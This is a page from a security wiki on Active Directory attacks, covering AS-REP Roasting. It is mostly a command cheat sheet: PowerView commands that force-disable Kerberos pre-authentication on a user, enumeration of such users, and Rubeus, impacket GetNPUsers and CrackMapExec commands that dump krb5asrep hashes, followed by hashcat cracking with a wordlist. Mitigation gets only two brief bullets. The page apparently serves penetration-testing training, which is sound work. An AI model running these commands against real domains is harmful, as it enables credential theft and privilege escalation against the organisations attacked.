📄
Bufu-Sec Wiki
GithubTwitter
  • Bufu-Sec Wiki
  • Active Directory
    • General
      • General
      • Installation
      • DNS
      • Kerberos
      • Kerberos Delegation
    • Enumeration
      • AD Module
      • Bloodhound
      • PowerShell Cheatsheet
      • PowerView Cheatsheet
      • Users
      • Groups
      • Computers
      • OUs
      • GPOs
      • ACLs
      • Domains
      • Trusts
      • Forest Mappings
      • Files and Shares
      • Kerbrute
    • Privilege Escalation
      • Kerberoasting
      • AS-REP Roasting
      • Constrained Delegation
      • Unconstrained Delegation
      • DNS Admins
    • Lateral Movement
      • PS Remoting
      • Credential Dumping
      • DC Sync
      • Overpass the Hash
      • Ticket Harvesting
      • Pass the Ticket
    • Persistence
      • Golden Tickets
      • Silver Tickets
      • ACL Attacks
      • Custom SSPs
      • DC Shadow
      • Skeleton Key
      • DSRM
    • Trust Attacks
      • Cross Domain Attacks
      • Cross Forest Attacks
      • MSSQL Servers
    • MITM & Relay Attacks
      • LLMNR Poisoning
      • SMB Relay
      • IPv6 Attacks
    • Detection & Defense
      • Domain Admins
      • Architectural Changes
      • Microsoft ATA
Powered by GitBook
On this page
  • Overview
  • Exploitation
  • Force Disable Kerberos Preauth
  • Enumerate Users with Preauth Disabled
  • Mitigation
  • Further Reading
  1. Active Directory
  2. Privilege Escalation

AS-REP Roasting

Overview

  • Dump krbasrep5 hashes of user accounts without Kerberos pre-authentication

  • Users do not have to be service accounts

  • Must have pre-authentication disabled

  • Can request any authentication data (encrypted TGT) for any user since KDC skips validation

  • Crack dumped hash with hashcat

Exploitation

Force Disable Kerberos Preauth

# Using PowerView 3.0/dev
# Enumerate permissions for RDPUsers on ACLS
Invoke-ACLScanner -ResolveGUIDS | ?{ $_.IdentityReferenceName -match "RDPUsers" }

# Disable preauth for user
Set-DomainObject -Identity Control572User -XOR @{useraccountcontrol=4194304} -Verbose

Enumerate Users with Preauth Disabled

# Using PowerView 3.0/dev
Get-DomainUser -PreauthNotRequired -Verbose | Select samaccountname

# Using AD Module
Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true } -Properties DoesNotRequirePreAuth

# Query AS-REP-roastable users with impacket from Kali host
# Supply userlist and don't require authentication
GetNPUsers.py -dc-ip 10.10.149.145 -no-pass -usersfile users.txt -format hashcat -outputfile hashes.asrep spookysec.local/

# Dump KRBASREP5 hash for specific user and output in hashcat format to file
.\Rubeus.exe asreproast /user:control572user /format:hashcat /outfile:control572user.asrep

# Dump hashes with credentials using CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt

# Transfer hash onto attacker and insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User.....
# Crack hash with hashcat
hashcat -a 0 -m 18200 hash.txt rockyou.txt

Mitigation

  • Strong password policy

  • Enable Kerberos Pre-Authentication

Further Reading

PreviousKerberoastingNextConstrained Delegation

Last updated 2 years ago

iRedTeam: AS-REP Roasting
XPN: Kerberos AD Attacks - More Roasting with AS-REP
harmj0y: Roasting AS-REPs